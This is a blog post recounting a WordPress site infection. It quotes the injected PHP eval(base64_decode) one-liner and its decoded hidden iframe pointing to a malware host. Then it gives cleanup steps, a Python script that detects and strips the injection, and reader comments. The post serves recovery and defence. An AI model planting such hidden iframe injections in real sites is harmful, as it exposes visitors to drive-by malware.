emoodz.com Hacked?!
So I decided to go back to blogging. I updated WordPress to the latest version and started typing a couple of posts before it hit me. Something was really getting fishy around the blog. The Dashboard all of a sudden decided to stop functioning and took me to a blank white page, and a couple of hours later other sections of the blog were also pointing to either dead links or showing gibberish scribbles. It took me a good two hours and the help of an expert to realize what had happened.. I was hacked!
Something, somehow, inserted malicious code into each and every single PHP file in the entire blog. What I saw was a one-liner right at the beginning of each infected PHP file that looked like this:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl...=="));?>
When I decoded it (using this), it revealed the following:
<iframe src="http://iss9w8s89xx.org/in.php" width=1 height=1 frameborder=0>
(That is the keyword I used to google it; “iframe trojan” is apparently what it is called.)
Why would anyone want to hack a dormant blog, you’d ask? It was all automated..
My FTP program stores all saved website passwords in an unencrypted text file, which is how the Trojan gained access to the website.
I have spent extensive time researching the matter online and thought I’d spare whoever it is that decides to google this the pain I had to go through. Now forget all those WordPress support forum contributors or other blogs that advise a fresh install of WordPress, or those that tell you to manually edit each and every PHP file you have for the code.
What you have to do is the following:
- Change ALL your passwords: I still haven’t figured out exactly which passwords were used; I would advise changing the WordPress password and, most importantly, the FTP password.
- Download the ENTIRE site to your local machine.
- Clean up the files using this VBS script I found on “Thydzik’s technology blog” here to automate the cleaning process. Place it in your local root directory and run it. A log file will be generated at C:\cleanUpWordPressPHP.txt listing the files it has cleaned. (More details here)
- Re-upload the site.
- Download, Install and Update WordPress Antivirus Plugin (here)
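As an added example (not the VBS script from Thydzik’s blog or anything from this post), here is a Python cleaner for the local copy you downloaded in the steps above: it matches the eval(base64_decode("...")) one-liner at the start of each .php file, strips only that leading line so the site’s own code is untouched, decodes the blob so you can see what it hid, and writes a log of the cleaned paths. The log file name and the sample file contents are constructed for the example.

```python
import base64
import re
from pathlib import Path

# The injected one-liner seen on this blog: open tag, empty comment,
# eval(base64_decode("...")), close tag, all before the real file starts.
INJECT_RE = re.compile(
    r'<\?php\s*/\*\*/\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);\s*\?>[ \t]*\r?\n?'
)

def find_injection(source):
    """Return (payload_b64, cleaned_source). payload_b64 is None when the
    file does not begin with the injected line; only the leading match is
    removed, so the site's own PHP code is left untouched."""
    m = INJECT_RE.match(source)
    if m is None:
        return None, source
    return m.group(1), source[m.end():]

def decode_payload(payload_b64):
    """Decode the blob for triage; on the blog it hid a 1x1 iframe."""
    return base64.b64decode(payload_b64).decode("utf-8", errors="replace")

def clean_tree(root, log_path="cleanUpWordPressPHP.txt"):
    """Walk a local copy of the site, strip the injection from every
    .php file that carries it, and log the cleaned paths (assumed log name)."""
    cleaned = []
    for path in Path(root).rglob("*.php"):
        text = path.read_text(encoding="utf-8", errors="replace")
        payload, fixed = find_injection(text)
        if payload is None:
            continue
        path.write_text(fixed, encoding="utf-8")
        cleaned.append(str(path))
    Path(log_path).write_text("\n".join(cleaned) + "\n", encoding="utf-8")
    return cleaned

# Constructed sample: a harmless payload stands in for the real blob.
SAMPLE_PAYLOAD = 'echo "constructed placeholder";'
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
SAMPLE_CLEAN = "<?php\n// wp-config.php (constructed)\ndefine('DB_NAME', 'wp');\n"
SAMPLE_INFECTED = (
    '<?php /**/ eval(base64_decode("%s"));?>\n' % SAMPLE_B64
) + SAMPLE_CLEAN

if __name__ == "__main__":
    payload, fixed = find_injection(SAMPLE_INFECTED)
    print("payload decodes to:", decode_payload(payload))
    print("cleaned file starts with:", fixed.splitlines()[0])
```

Run clean_tree on the downloaded copy before re-uploading; files it leaves alone did not start with the injected line, so review anything the log does not list but still misbehaves.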
The Trojan wasn’t designed with WordPress in mind, and that’s why I believe the damage was minimal. It is just a true pain to get rid of. I have officially wasted two evenings of my life doing nothing but this.
Further information about this can be read on this
So in reality it was your Windows PC that got infected with a Trojan, which in turn hacked your site.
Don’t get ahead of yourself here, bu3li; the trojan can (and did) infect Mac machines.
[...] blogger Mohammed Al Maskati suspects that his blog has been hacked and here's what he did. [...]